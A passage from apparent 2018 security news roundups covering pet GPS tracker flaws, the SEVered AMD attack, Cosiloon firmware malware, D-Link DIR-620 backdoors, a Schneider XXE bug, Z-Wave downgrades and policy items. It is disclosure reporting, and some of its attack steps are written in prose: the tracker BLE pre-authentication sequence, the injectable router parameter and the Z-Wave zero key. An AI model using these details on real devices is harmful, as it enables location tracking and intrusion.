On the bright side, the app does not store the authentication token or password in their own folder, which is the proper way to guard against Trojans that use superuser rights to steal data.

Registered CVE:
CVE-2018-7040
CVE-2016-6541

Tractive
Unlike most devices we studied, this tracker does not communicate directly with the smartphone—only through its own servers. This approach is secure enough, but we detected some minor issues in the Android app. First, as in other cases, it does not verify the server certificate, which facilitates MITM attacks. What’s more, the app stores the authentication token in unencrypted form:


As well as pet movement data:


It should be noted that this data is not so easy to steal, since other apps cannot read it. But there are Trojans that can steal data from other apps by exploiting superuser rights.

Weenect WE301
This is another tracker that doesn’t interface with the owner’s smartphone directly, but transfers pet coordinates to the server via a built-in SIM card. We didn’t encounter any security issues with this tracker, but problems similar to those in Tractive were detected in the Android version of the app.

First, it does not prevent MITM attacks, allowing attackers to access the user’s account or intercept geoinformation. Second, authentication data is stored in the app folder in unencrypted form, exposing it to Trojans with superuser rights on the device.

Whistle 3
This is one of the most technically interesting trackers in the study. It can transfer GPS coordinates via its built-in SIM card, via Wi-Fi to its server (if the owner provides a Wi-Fi network password), or directly to the owner’s smartphone via BLE.

We looked at Wi-Fi first of all and found that the developers had taken care to secure the connection: The device transmits small portions of data over HTTPS (that is, in encrypted form).

Wi-Fi data transfer is secured using HTTPS

Next, we checked the BLE connection and found many security issues. The first is the lack of proper authentication. After connecting, the device waits for a certain sequence of actions to be performed, which could be described as pre-authentication. The sequence is so simple that a third party can easily reproduce it. All it takes is to connect to the device, transfer two characteristics to WRITE_TYPE_NO_RESPONSE mode, request a change in the size of transmitted data (MTU), turn on notifications for one characteristics, and transfer a certain number to another characteristics.

Now the tracker is ready to receive and execute commands that do not contain a user ID, which means that anyone can send them. For example, it is possible to send an initiateSession command, and in response the device will send an unencrypted set of data, including the device coordinates. What’s more, if this command is continuously transmitted, the gadget will not send location data via the SIM card, since it will assume that such data has already been received “directly.” Thus, it is possible to “hide” the tracker from its owner.

There is one more problem: the tracker transmits data to the server without any authentication. This means that anyone can substitute it, altering the coordinates in the process.

The app transmits data received from the tracker via BLE

The Android app uses the HTTPS protocol (which is good), but does not verify the server certificate.

MITM attacks can intercept user data

Not only that, the smartphone app stores user data in unencrypted form in its own folder, exposing it to theft by a Trojan with superuser rights. However, authentication data is stored correctly.

Tracker coordinates from the app database

Note that the Android app writes data to logcat. As mentioned above, despite the fact that other app logs can read only some system utilities or apps with superuser rights, there is no need to write important data to the log.

The Android app can log user and pet data (activity, email address, name, owner’s phone number), as well as one of the used tokens

Registered CVE:
CVE-2018-8760
CVE-2018-8757
CVE-2018-8759
CVE-2018-9917

Conclusions
GPS trackers have long been applied successfully in many areas, but using them to track the location of pets is a step beyond their traditional scope of application for this, they need to be upgraded with new “user communication interfaces” and “trained” to work with cloud services, etc. If security is not properly addressed, user data becomes accessible to intruders, endangering both users and pets.

Research results: four trackers use Bluetooth LE technology to communicate with the owner’s smartphone, but only one does so correctly. The rest can receive and execute commands from anyone. Moreover, they can be disabled or hidden from the owner—all that’s required is proximity to the tracker.

Just one of the tested Android apps verifies the certificate of its server, without relying solely on the system. As a result, they are vulnerable to MITM attacks—intruders can intercept transmitted data by “persuading” victims to install their certificate.


Experts show how to defeat AMD’s Secure Encrypted Virtualization
26.5.2018 securityaffairs Safety

German researchers devised a method, dubbed SEVered, to defeat the security mechanisms Secure Encrypted Virtualization implemented by the AMD Epyc server microchips to automatically encrypt virtual machines in memory.
The attack could allow them to exfiltrate data in plaintext from an encrypted guest via a hijacked hypervisor and simple HTTP requests to a web server running in a second guest on the same machine.

The Secure Encrypted Virtualization feature allows to encrypt and decrypt virtual machines on the fly while stored in RAM to protect them from snooping on VMs.

Thanks to the Secure Encrypted Virtualization, hijacked hypervisor, kernel, driver, or malware should be able to snoop on a protected virtual machine.

The team of Fraunhofer AISEC researchers, composed of Mathias Morbitzer, Manuel Huber, Julian Horsch and Sascha Wessel, demonstrated that the SEVered technique could to bypass Secure Encrypted Virtualization protections and copy information from a virtual machine.

“We present the design and implementation of SEVered, an attack from a malicious hypervisor capable of extracting the full contents of main memory in plaintext from SEV-encrypted virtual machines. SEVered neither requires physical access nor colluding virtual machines, but only relies on a remote communication service, such as a web server, running in the targeted virtual machine.” reads the research paper published by the researchers.

“We verify the effectiveness of SEVered on a recent AMD SEV-enabled server platform running different services, such as web or SSH servers, in encrypted virtual machines”

An attacker at the host level can alter a guest’s physical memory mappings through standard page tables, causing the failure of the Secure Encrypted Virtualization mechanism in isolating and scrambling parts of the VM in RAM.

“We base SEVered on the observation that the page-wise encryption of main memory lacks integrity protection. While the VM’s Guest Virtual Address (GVA) to Guest Physical Address (GPA) translation is controlled by the VM itself and opaque to the HV, the HV remains responsible for the Second Level Address Translation (SLAT), meaning that it maintains the VM’s GPA to Host Physical Address (HPA) mapping in main memory.” continues the paper.

“This enables us to change the memory layout of the VM in the HV. We use this capability to trick a service in the VM, such as a web server, into returning arbitrary pages of the VM in plaintext upon the request of a resource from outside”

Secure Encrypted Virtualization amd

The researchers set up a test environment running an AMD Epyc 7251 processor with SEV enabled and Debian GNU/Linux installed, running an Apache web server and an OpenSSH in two separate virtual machines.

By modifying the system’s Kernel-based Virtual Machine KVM hypervisor, the experts demonstrated that it is possible to observe when software within a guest accessed physical RAM.

Then the researchers sent a large number of requests at one of the services, for example fetching an HTML webpage from Apache. In this scenario, the hypervisor was able to see which pages of physical memory are being used to hold the file, then by switching the page mappings an encrypted page in another virtual machine is used by Apache to send the requested webpage, and therefore sends the automatically decrypted memory page of the other VM instead.

With this trick, the attacker could force the Apache service in leaking data from another guest.

“With the knowledge about the location of the resource, we were able to reliably extract the entire memory of the target VM on our prototype implementation,” continues the paper.

“The resource was always sticky over the whole process. While preserving the VM’s stability at all times, the extraction of its entire 2 GB also worked under the noise model introduced for the identification phase.”

The experts demonstrated the efficiency of the SEVered attack in extracting the entire memory from an SEV-protected VM.

Experts also analyzed countermeasures, the best one consists in providing a full-featured integrity and freshness protection of guest-pages additional to the encryption.

“The best solution seems to be to provide a full-featured integrity and freshness protection of guest-pages additional to the encryption, as realized in Intel SGX. However, this likely comes with a high silicon cost to protect full VMs compared to SGX enclaves,” the experts concluded.

“A low-cost efficient solution could be to securely combine the hash of the page’s content with the guest-assigned GPA.”


Pre-installed malware found in 141 low-cost Android devices in over 90 countries
26.5.2018 securityaffairs Android

Researchers from Avast the antivirus firm are investigating the discovery of pre-installed malware found in 141 low-cost Android devices in over 90 countries.
Security experts from Antivirus firm Avast have discovered a new case of pre-installed malware on low-cost Android devices, crooks injected the malicious code in the firmware of 141 models.

The operation is linked to the discovery made in December 2016 by researchers at antivirus firm Dr. Web, when the experts reported a crime gang that had compromised the supply-chain of several mobile carriers, infecting mobile devices with malware.

In 2016, the malware infected the firmware of at least 26 low-cost Android smartphone and tablets models. The firmware of a large number of popular Android devices operating on the MediaTek platform was compromised with at least two types of downloader Trojans.
Both malware found in low-cost Android mobile devices, detected as Android.DownLoader.473.origin and Android.Sprovider.7 were able to collect users’ data, displays advertisements on top of running applications and downloads unwanted apps. These low-cost Android smartphones and tablets were mostly marketed in Russia.

Back in the present, Avast experts believe the same criminal gang is still active and is continuing the same operation by compromising the firmware of many other devices by injecting a malware dubbed Cosiloon.

The researchers discovered infected devices in over 90 countries, and all of them use a Mediatek chipset, but MediaTek is not the root cause of the infections because only the firmware for some devices from an affected smartphone model is tainted with malware. This means that attackers did not compromise the MediaTek firmware components.

“The adware we analyzed has previously been described by Dr. Web and goes by the name “Cosiloon.” As can be seen in the screenshots below, the adware creates an overlay to display an ad over a webpage within the users’ browser. The adware has been active for at least three years, and is difficult to remove as it is installed on the firmware level and uses strong obfuscation.” reads the analysis published by Avast.

“Thousands of users are affected, and in the past month alone we have seen the latest version of the adware on around 18,000 devices belonging to Avast users located in more than 100 countries including Russia, Italy, Germany, the UK, as well as some users in the U.S.”

Avast published a list of over 140 Android smartphones and tablets on which it says it found the group’s malware —which they named Cosiloon.

The Cosiloon malware is the same that was spotted in 2015 by Dr. Web and according to the experts it hasn’t received any updates.

The malware is composed of two separate APKs, the dropper, and the payload. In the older versions of the malware, the experts noticed a separate adware app pre-installed in the /system partition, in most recent variants the researchers found a new dropped payload.

“A second variant of the dropper is a bit more interesting. The code is pretty much the same as the first variant, but it is not a separate system application. The code is embedded in SystemUI.apk, an integral part of the Android OS. This makes the dropper pretty much impossible to remove by the user.” continues the analysis.

The dropper runs from the “/system” folder with full root privileges, it downloads an XML file from a remote server and then installs other malicious apps.

In almost any infection, the malicious codes were used to display ads on top of mobile apps or the Android OS interface.

Cosiloon pre-installed malware

The experts noticed the pre-installed malware doesn’t drop any malicious app if the device language is set to Chinese, when the device’s public IP address is also from a Chinese IP range, and when the number of installed apps is below three (a circumstance that could indicate that the malware is running in a test environment).

Avast researchers confirmed that the infection point is still a mystery due to the large number of vendors involved, the detection of the dropper in very complicated as explained in the analysis.

“Detecting the dropper is further complicated by the fact that it is a system app, part of the devices’ read-only firmware, which is integrated in the device shipped from the factory.” continues the analysis.

“Also, it is likely odexed in most firmwares, meaning the app’s code was removed from the original APK file, optimized and stored separately during the firmware’s build process. As a result, cybersecurity firms are likely missing many of the dropper samples and have to rely on the payload for detection and statistics.”

Experts believe the attackers are opportunistic and target in some way the supply chain at random, every time they have the possibility to compromise the firmware of the vendors.

The control server was up until April 2018, crooks have produced new payloads over the time while new devices were shipped by several manufacturers with the pre-installed dropper.

The experts have attempted to disable Cosiloon’s C&C server by sending takedown requests to the domain registrar and server providers. While the ZenLayer provider quickly shut down the server, but crooks moved their activities to another provider that did not respond to Avast’s request.

“Avast Mobile Security can detect and uninstall the payload, but it cannot acquire the permissions required to disable the dropper, so Google Play Protect has to do the heavy lifting.” concluded Avast.

“If your device is infected, it should automatically disable both the dropper and the payload. We know this works because we have observed a drop in the number of devices infected by new payload versions after Play Protect started detecting Cosiloon.”

Further details, including IoCs for the Cosiloon pre-installed malware are reported in the Avast analysis.


Backdoors in D-Link’s backyard

26.5.2018 Kaspersky Vulnerebility
Multiple vulnerabilities in D-Link DIR-620 router
“If you want to change the world, start with yourself.” In the case of security research this can be rephrased to: “If you want to make the world safer, start with the smart things in your home.” Or, to be more specific, start with your router – the core of any home network as well as an interesting research object. And that router you got from your ISP as part of your internet contract is even more interesting when it comes to research.

The impact of vulnerabilities
Note: the following information about vulnerabilities has been submitted to the respective stakeholders (D-Link, ISP provider, Mitre) and we are publishing this information in accordance with vulnerability disclosure policy.

The following advisory describes four vulnerabilities and hardcoded accounts in D-Link DIR-620 firmware. The firmware runs on various D-Link routers that one of the biggest ISPs in Russia delivers to its customers (this conclusion is based on the fact that the router is provided as part of the standard customer contract and the hardcoded credentials contain the name of the ISP in the login string). This is probably why this particular model of router is so popular in Russia and CIS countries (most home routers are located behind their ISP’s NAT, which is why these routers don’t appear in the statistics).

Geography of vulnerable routers


The object of research
The latest versions of the firmware have hardcoded default credentials that can be exploited by an unauthenticated attacker to gain privileged access to the firmware and to extract sensitive data, e.g., configuration files with plain-text passwords. The vulnerable web interface allows an unauthenticated attacker to run arbitrary JavaScript code in the user environment and run arbitrary commands in the router’s operating system (OS).

Example of firmware interface (probably customized for ISP purposes)

These issues were originally identified in firmware version 1.0.37. Some of the discovered vulnerabilities were also identified in other versions of the firmware:

1.3.1
1.3.3
1.4.0
2.0.22
Technical details
Weakness in user data validation (reflected cross-site scripting) (CVE-2018-6212)
The one input field that allows user input – Quick search – inspired me to look deeper into the firmware: the field facilitates an XSS attack vector. A reflected cross-site scripting (XSS) attack is possible as a result of missed filtration for special characters in this field and incorrect processing of the XMLHttpRequest object (this vulnerability was discovered in v.1.3.3, but also present in other versions).

Demonstration of a reflected XSS

Vulnerability metrics:

CVSS v3 Base Score: 6.1

Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

Hardcoded default credentials for web dashboard (CVE-2018-6213)
I downloaded the firmware and extracted the filesystem. Most Unix-based firmware includes BusyBox – software that provides several stripped-down Unix tools for embedded systems. It can easily identify the proprietary binary files, i.e., all binaries that are not in the original BusyBox toolset and which were probably modified for ISP purposes.

I extracted strings from the web server binary (httpd), and my attention was immediately drawn to the “anonymous” string. I looked at the function where this string was being used.

The code responsible for checking the user’s credentials contains ‘harcoded credentials’

These privileged credentials cannot be changed by the administrator. Privileged access to the dashboard allows an attacker to extract sensitive data.

Vulnerability metrics:

CVSS v3 Base Score: 6.5

Vector: (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

OS command injection (CVE-2018-6211)
An OS command injection vulnerability is possible as a result of incorrect processing of the user’s input data in the following parameter (the vulnerability was discovered in v.1.0.3):

/index.cgi?<…>&res_buf

Example of request with OS command injection

Vulnerability metrics:

CVSS v3 Base Score: 9.1

Vector: (/CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

Hardcoded default credentials for Telnet (CVE-2018-6210)
Using the vulnerability above, an attacker can extract Telnet credentials. The credentials were discovered in firmware v1.0.3. For example, by using the default credentials for Telnet an attacker can get administrative access to a router (the fragment of “etc/passwd”).

Demonstration of OS command injection vulnerability

Vulnerability metrics:

CVSS v3 Base Score: 10.0

Vector: (/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

How to fix it
We received an official response from the vendor stating that this router model was no longer supported. In this case, we provide the following recommendations:

Restrict any access to the web dashboard using a whitelist of trusted IPs
Restrict any access to Telnet
Regularly change your router admin username and password
Advisory Status
01/15/2018 – reported to vendor
01/15/2018 – reported to ISP
01/24/2018 – received a response from ISP
02/06/2018 – received a response from vendor. Official statement: the model of router was no longer supported by vendor, so vendor will only patch vulnerabilities if the ISP sends a request to do so.


CVE-2018-7783 flaw in Schneider SoMachine Basic can be exploited to read arbitrary files on the targeted system
26.5.2018 securityaffairs 
Vulnerebility

Schneider Electric issued a security update for its EcoStruxure Machine Expert (aka SoMachine Basic) product that addresses a high severity vulnerability, tracked CVE-2018-7783, that could be exploited by a remote and unauthenticated attacker to obtain sensitive data.

“SoMachine Basic suffers from an XML External Entity (XXE) vulnerability using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via out-of-band (OOB) attack.” reads the security advisory published by Schneider Electric.

“The vulnerability is triggered when input passed to the xml parser is not sanitized while parsing the xml project/template file”

The EcoStruxure Machine Expert is a tool to program Schneider Modicon M221 programmable logic controller (PLC).

The ML external entity (XXE) vulnerability was discovered by the Gjoko Krstic, a researcher at industrial cybersecurity firm Applied Risk.

According to the expert, the flaw affects SoMachine Basic 1.6.0 build 61653, 1.5.5 SP1 build 60148, and likely earlier versions, it could be exploited by an attacker to launch an out-of-band (OOB) attack.

In order to exploit the flaw, the attacker has to trick victims to open a specially crafted SoMachine Basic project or template file.

Krstic also discovered that in certain circumstances the attackers can trigger the vulnerability for arbitrary code execution and to cause a denial-of-service (DoS) condition.

Schneider Electric addressed the vulnerability with the release of SoMachine Basic v1.6 SP1.

SoMachine Basic Schneider Electric

Early May, researchers at Tenable have disclosed technical details and a PoC code for a critical remote code execution vulnerability affecting Schneider Electric InduSoft Web Studio and InTouch Machine Edition products.

A few days ago, Schneider Electric published a security advisory to warn customers of multiple vulnerabilities in the Flexera FlexNet Publisher component used in the Schneider Electric Floating License Manager software in PlantStruxure PES.

One week ago, Schneider published another advisory to inform customers that these flaws also impact PlantStruxure PES.


Email Leakage - An Overlooked Backdoor to GDPR Failure
25.5.2018 securityweek Privacy   

On May 25, 2018, two years after it was adopted by the European Union, the General Data Protection Regulation (GDPR) came into force. For two years companies have been bombarded with offers for GDPR solutions from security firms; and publications have been bombarded with surveys claiming that only n% of firms are ready or even understand GDPR.

In truth, however, the 'data protection' element in GDPR is little different to pre-existing European laws. The GDPR changes come in the way user data is gathered, stored, processed, and made accessible to users; in breach disclosure; and in the severity of non-compliance fines.

That said, companies can learn from last year's data protection non-compliance incidents to gain insight into next year's potential GDPR non-compliance fines. One source is the statistics available from the Information Commissioner's Office (ICO -- the UK data protection regulator).

The ICO's latest 'Data security incident trends' report was published on 14 May 2018. During Q4, the ICO levied just a single fine: £400,000 on Carphone Warehouse Ltd "after serious failures put customer data at risk." There were, however, a total of 957 reported data security incidents. The ICO defines these as "a major concern for those affected and a key area of action for the ICO."

An analysis of those incidents is revealing. Healthcare -- a major worldwide criminal target for extortion and theft of PII -- reported a total of 349 data security incidents in Q4. The most common incidents were not technology-related: 121 incidents involved data posted or faxed to the wrong recipient, or the loss or theft of paperwork.

The most frequent technology-related incidents were not down to hacking, but to simple email failures (49) involving data sent to the wrong recipient, or a failure to use BCC when sending email. There is, in short, an easily overlooked backdoor into GDPR non-compliance.

Data sent to the wrong recipient is commonly addressed by data labeling and data loss prevention technologies. One problem is a high level of both false positives and false negatives. Employees charged with labeling the data they generate frequently 'over-label'; that is, they label unprotected data as 'sensitive' in an abundance of caution. This can lead to time-consuming, hampered workflows. Alternatively, sensitive data can remain unlabeled and still be sent to the wrong address.

In September 2017, the national Law Journal reported, "Wilmer, Cutler, Pickering, Hale and Dorr was caught Wednesday in an email mix-up that revealed secret U.S. Securities and Exchange Commission and internal investigations at PepsiCo, after a Wilmer lawyer accidentally sent a Wall Street Journal reporter privileged documents detailing a history of whistleblower claims at the company." This was not just an embarrassment; had it involved any EU data, it would have been a serious breach of GDPR.

(While writing this article, the author received an email from a major cybersecurity vendor: "You may have accidentally received an email from us yesterday with the subject line “SUBJECT LINE”. Our server had a bad moment and sent the email to wrong people." This was a benign error -- but it could have been serious, and it further illustrates the problem.)

One new start-up firm -- UK-based Tessian -- is seeking to solve the email GDPR backdoor using machine learning artificial intelligence. "What we're doing," co-founder and CEO Tim Sadler told SecurityWeek, "is helping organizations protect against the human threats. At our core, we prevent organizations sending highly sensitive emails to the wrong people."

The difficulty with the email problem is that it doesn't lend itself to a traditional rules-based solution -- email is used too frequently, too easily, with too many subjects and to too many people. "The approach we have taken is machine learning," explained Sadler. "We analyze historical communications patterns to understand the kind of information that is shared with different people in the user's network. On outgoing emails we understand anomalies. We understand that it is unusual that this data is shared with that contact. This is an approach we have not seen elsewhere, but it is one that works very effectively."

He claims that within 24 hours of analyzing the user email logs, a base-line of 'normality' can be produced. Anomalies to that baseline are flagged. Users are kept on board by being fully involved -- flagged emails aren't simply blocked. A full explanation of the system's decision is relayed to the user and can be accepted or overridden -- and the user's response is added to the system's machine learning knowledge. Using credit card fraud as an analogy, he said, "We don't just block the card because of anomalous behavior, we explain why, we ask the user if he wants to unblock it -- and we learn from the process."

The company was founded in 2013 by Tim Sadler, Ed Bishop and Tom Adams, and was originally known as CheckRecipient. In April 2017 it raised $2.7 million seed funding, bringing the total seed funding to $3.8 million. The company was rebranded and renamed as Tessian in February 2018. Part of the reason for the rebranding is the evolving and growing nature of the company.

"Our belief at Tessian," Sadler told SecurityWeek, "is that organizations' security has moved on from perimeter firewalls, and even endpoint security. I think we are in a third phase here, where humans are the real endpoints of the organization." If you look at how hackers try to break into a company, they're not so much hacking devices as hacking the humans.

We are focused on building security for the human endpoint. In short, we are thinking not just about outbound email threats, but also inbound email threats; and in going beyond that to understand what are the other ways in which humans leak data within an enterprise."

Sadler declined to go into details on Tessian's future road map -- but it is probably fair to say that a machine learning solution to BEC and general phishing threats is on the drawing board. Right now, Tessian is almost unique in bringing a machine learning solution to an email problem that from historical data is likely to prove a major and often overlooked threat to GDPR compliance.


Europol Signs Cybersecurity Agreement With EU Agencies, WEF
25.5.2018 securityweek BigBrothers   

Europol this week signed two memorandums of understanding related to cybersecurity cooperation – one with the World Economic Forum (WEF) and one with the European Union Agency for Network and Information Security (ENISA), the European Defence Agency (EDA), and the EU’s Computer Emergency Response Team (CERT-EU).

The memorandum of understanding (MoU) signed on Wednesday between Europol, ENISA, EDA and CERT-EU establishes a cooperation framework on cyber security and cyber defense.

The agreement focuses on cyber exercises, education and training, exchange of information, strategic and administrative matters, and technical cooperation. The MoU also allows cooperation in other areas that may turn out to be important for all four organizations.

“EDA supports Member States in the development of their defence capabilities. As such, we also act as the military interface to EU policies,” said Jorge Domecq, chief executive of the EDA. “Today’s Memorandum of Understanding is an important step towards increased civil-military cooperation and synergies in the area of cyber security and cyber defence.”

“The EU institutions, bodies and agencies rely on the specialised skills and tools in threat intelligence and incident response of CERT-EU. But, we don’t maintain these capacities by acting alone. That is why acting together with our peers and partners in the other signatories to this Memorandum is so important,” stated Ken Ducatel, acting head of CERT-EU.

As for the MoU signed on Friday by Europol and the WEF, it focuses on establishing a cooperation framework whose goal is to make cyberspace safe for individuals, businesses and organizations.

The WEF and Europol recently announced the launch of a Global Cyber Security Centre located in Geneva, Switzerland.

As part of the new agreement, Europol and WEF will collaborate on the implementation of projects in common areas of interest, best practices, technical information on cybercrime, and statistical data.


UK Warns That Aggressive Cyberattack Could Trigger Kinetic Response
25.5.2018 securityweek BigBrothers   

UK Says it Doesn't Need to Demonstrate Attribution Before Engaging Cyber Retaliation

The scene was set last week when Air Marshall Phil Collins (Chief of Defence Intelligence, UK Ministry of Defence) spoke at the Royal United Services Institute (RUSI). In his speech Collins talked about the growing use of non-kinetic (primarily cyber) warfare.

"We can see numerous examples of this today," he said: "unprecedented industrial espionage activity against the UK and Allies; private security contractors being used in high-end expeditionary warfare in Syria; cyber-attacks against national infrastructure and reputation across Europe; information operations that attempt to pervert political process and frustrate the rule of law; and attempted assassinations."

He warned that the nature of modern warfare is becoming broader, more strategic, and features "continuous full spectrum competition and confrontation."

The UK's response, he said, "should be to understand first, to decide first, and then if necessary to act first, across the physical and virtual, to secure decision advantage and then operational advantage, seeking swift yet controlled exploitation of vulnerabilities and the proactive denial of opportunities."

The implication is that the UK requires the ability (and he makes it clear that he believes the UK has that ability) to both respond to cyber-attacks and if necessary launch preemptive cyber-attacks effectively in self-defense. What he doesn't discuss is the relationship of such actions to international law. That was left to a separate speech delivered Wednesday by the UK attorney general, Jeremy Wright QC MP, at Chatham House: Cyber and International Law in the 21st Century.

While Wright accepts that international cyber law is a difficult area, "cyberspace is an integral part of the rules based international order. That being so, it is the UK’s view that there are boundaries of acceptable state behavior in cyberspace, just as there are everywhere else."

Cyber WarefareWhat this means, he says, "is that hostile actors cannot take action by cyber means without consequence, both in peacetime and in times of conflict. States that are targeted by hostile cyber operations have the right to respond to those operations in accordance with the options lawfully available to them and that in this as in all things, all states are equal before the law."

In effect, his speech discusses legal and illegal nation-level cyber activity; and his view of a legal and illegal UK response to that.

Two aspects stand out. First, he defines a cyber-attack against the critical infrastructure that can or does lead to loss of life as an unlawful use of force that can trigger a non-cyber response. "The UK considers it is clear that cyber operations that result in, or present an imminent threat of, death and destruction on an equivalent scale to an armed attack will give rise to an inherent right to take action in self-defense, as recognized in Article 51 of the UN Charter."

Article 51 states, "Nothing in the present Charter shall impair the inherent right of individual or collective self-defense if an armed attack occurs..." In short, the UK attorney general is stating that such cyber-attacks can legally result in a kinetic military response.

In reality, there is little new here. Bryson Bort, CEO and founder at Scythe -- and a visiting fellow at the National Security Institute, George Mason university -- told SecurityWeek, "This 'position' tends to be the prevailing opinion, but between what is publicly stated and whatever classified response may have been made in line with this doctrine, we only have confirmation that loss of life equals kinetic response, a.k.a. traditional military reprisal."

Slavik Markovich, CEO and Co-founder at Demisto, wonders if -- under this doctrine -- a state can lawfully make a preemptive strike in order to prevent the potential future loss of life. "Take Stuxnet," he said. "Is it OK for a state to launch a cyber-attack on another states’ weapon systems to preemptively defend against said state that has publicly declared it wants to destroy the cyber offensive state?”

Jeremy Wright never uses the term preemptive -- but Air Marshall Collins does with his 'proactive denial of opportunities' assertion.

The second stand-out from Wright's speech suggests that cyber-attacks that do not threaten life cannot lawfully result in a kinetic response. This would include Russian interference in the U.S. 2016 election (note that former director of national intelligence James Clapper told PBS NewsHour Wednesday that he believes that Russian interference didn't just influence the election, but actually won it for Donald Trump).

Wright says it is clearly an unlawful act, and the victim (in this example, the U.S.) has the right to respond against the aggressor (in this example, Russia) -- but the type of response is tempered by the doctrine of countermeasures. "Countermeasures cannot involve the use of force, and they must be both necessary and proportionate to the purpose of inducing the hostile state to comply with its obligations under international law."

The UK disagrees in one matter with the work of the International Law Commission on countermeasures. It does not believe that a retaliating nation needs to tell the aggressor that it will retaliate -- it can simply do so. That retaliation cannot be by force, but does not need to be symmetrical to the underlying unlawful act.

In simple terms, a cyber-attack that leads to loss of life can legally elicit a military response. A cyber-attack that does not lead to loss of life can only legally elicit a greater cyber response. "This statement by the UK Attorney General is the first official statement that reflects the truth on the ground," comments Bort. It "is a pragmatic recognition of the realities of cyber warfare... It means a lot to be the first to provide this position publicly and the popularity of this position will grow from here."

But underlying these arguments -- and one discussed at some length by Wright -- is the problem of attribution. "There are obviously practical difficulties involved in making any attributions of responsibilities when the action concerned is capable of crossing traditional territorial boundaries and sophisticated techniques are used to hide the identity and source of the operation" he says. "Those difficulties are compounded by the ready accessibility of cyber technologies and the resultant blurring of lines between the actions of governments and those of individuals."

Nathan Wenzler, chief security strategist at AsTech, is particularly worried about attribution and the UK's attitude towards it. "It's a troubling problem," he told SecurityWeek, "and one which no one has solved to such an extent that would allow them to make definitive statements such as Mr. Wright's, and this leaves open the potential for a wide array of legal, ethical and political issues that may come about from retaliating against an entity that either did not actually commit the initial attack or ultimately had nothing to do with the attack at all. And, while nation-state sponsored cyber-attacks are a well-known issue, it doesn't mean that it is always the case, and the political ramifications of launching any type of response against another country without definitive proof can lead to far greater disasters."

Bort is a little less concerned. "Attribution is hard no matter who you are," he said. "But, nation states with advanced cyber and intelligence capabilities have a long history of solving the attribution problem. There may be a few more question-marks in the cyber domain as to who certain cyber attackers are, but it’s a generally small list of perpetrators to look at. The UK government will likely be absolutely sure when they respond."

The key phrase from Bort is 'intelligence capabilities'. Security researchers can only track cyber in cyber -- and that is the problem. Nation states -- particularly members of the 5 Eyes group -- have access to wide-ranging high-grade signals intelligence and on-the-ground agents that may provide irrefutable proof that the intelligence services will never reveal for fear of losing or endangering their sources.

"I fear this may just be a setup for more strained political relationships between adversaries and no real improvement to the overall security of the cyberspace used by their citizens, corporations and other entities," warns Wenzler. He may well be right; but there is one single sentence in Wright's speech that takes the issue to a new level.

"There is no legal obligation requiring a state to publicly disclose the underlying information on which its decision to attribute hostile activity is based, or to publicly attribute hostile cyber activity that it has suffered in all circumstances," he says.

If there is a purely political intent behind this speech, it is to warn foreign aggressor states that the UK (and/or its allies) can lawfully respond to an aggressive cyber-attack either by kinetic or cyber actions; and that it is not duty-bound to provide public proof of its attribution. It can legally strike back without warning.


More than 100 Million IoT devices potentially exposed to Z-Shave Z-Wave attack
25.5.2018 securityaffairs IoT  

Researchers from Pen Test Partners have conducted an analysis of Z-Wave wireless communications protocol used by millions of IoT devices and discovered that it is vulnerable to cyber attacks.
The Z-Wave protocol is widely adopted for home automation, it leverages low-energy radio waves for wireless communications over distances of up to 100 meters (330 feet).

The protocol is currently used by 700 companies in over 2,400 IoT and smart home products.

Z-Wave uses a shared network key to secure communications among devices, the key is exchanged between the controller and the client devices when the devices are paired.

The earlier pairing process (‘S0’) had a vulnerability – the network key was transmitted between the nodes using a key of all zeroes, and could be sniffed by an attacker within RF range.

Z-wave flaw

The initial version of the pairing process (S0) is known to be vulnerable to MITM attacks since 2013, for this reason, experts introduced a more secure process named S2.

While S0 was using a known encryption key (0000000000000000), S2 leverages stronger encryption, but the experts found a way to force a downgrade of the pairing process from S2 to S0.

The white hat hackers discovered that an attacker in range of the targeted devices during the pairing process (‘S0’) can easily sniff the network key because it was shared between

The experts dubbed the attack “Z-Shave,”

“The earlier pairing process (‘S0’) had a vulnerability – the network key was transmitted between the nodes using a key of all zeroes, and could be sniffed by an attacker within RF range. This issue was documented by Sensepost in 2013. We have shown that the improved, more secure pairing process (‘S2’) can be downgraded back to S0, negating all improvements.” reads the analysis published by the experts.

“Once you’ve got the network key, you have access to control the Z-Wave devices on the network. 2,400 vendors and over 100 million Z-wave chips are out there in smart devices, from door locks to lighting to heating to home alarms.”

The experts published a video PoC of the attack on a Yale smart lock “Z-Shave,” works against any device using Z-Wave.

Researchers at Pen Test Partners explained that an attacker could use a battery-powered hacking device that is left outside the targeted building waiting for the pairing process to be initialized.

“A downgrade to no security may sound like it has more serious impact, but it means that the attacker cannot obtain the S0 network key. This means the only node placed at risk is the one just added. If an S0 network key is obtained, all S0 devices connected in the past and future are placed at risk.” explained the experts.

“The bigger difference is that our attack can be carried out by an active attacker within RF range at the time of pairing. And when we say active attacker – we don’t mean a guy in a hoody sat in a car with a laptop. A battery-powered drop-box could be left outside the property for weeks, waiting for a pairing event to occur.”

It turns out that a variant of this downgrade attack was discovered last year by cybersecurity consulting firm SensePost, but the vendor told experts at the time that this was by design and needed for backwards compatibility.

The experts explained that the Z-Wave Alliance still hasn’t addressed the issue, a delay that could have serious consequences.

“We aren’t certain how backward compatibility with S0 can be supported whilst enforcing stronger S2 security. This underlines the challenge with many protocols: how do you improve security without creating mountains of electronic waste for devices that are no longer supported?” concluded the experts.

“At the very least, the user should be fully alerted to the fallback to weak security.”


Russian Police Arrest Man Involved in Android Banking Trojan Scheme
25.5.2018 securityweek Crime 
Virus   

Law enforcement authorities in Russia have arrested an unnamed 32-year-old man who is believed to be part of a cybercrime ring that made up to $8,000 per day using Android banking Trojans.

According to Russia-based cybersecurity firm Group-IB, the suspect is an unemployed Russian national who had previously been convicted for arms trafficking. He was arrested earlier this month and reportedly already confessed.

The cybercrime group used a malicious Android app named “Banks at your fingertips” to trick the customers of Russian banks into handing over their financial information. The banking Trojan was disguised as a tool that claimed to allow users to access all their bank accounts from one Android app. It offered users the possibility to view balances, transfer money between payment cards, and pay for online services.

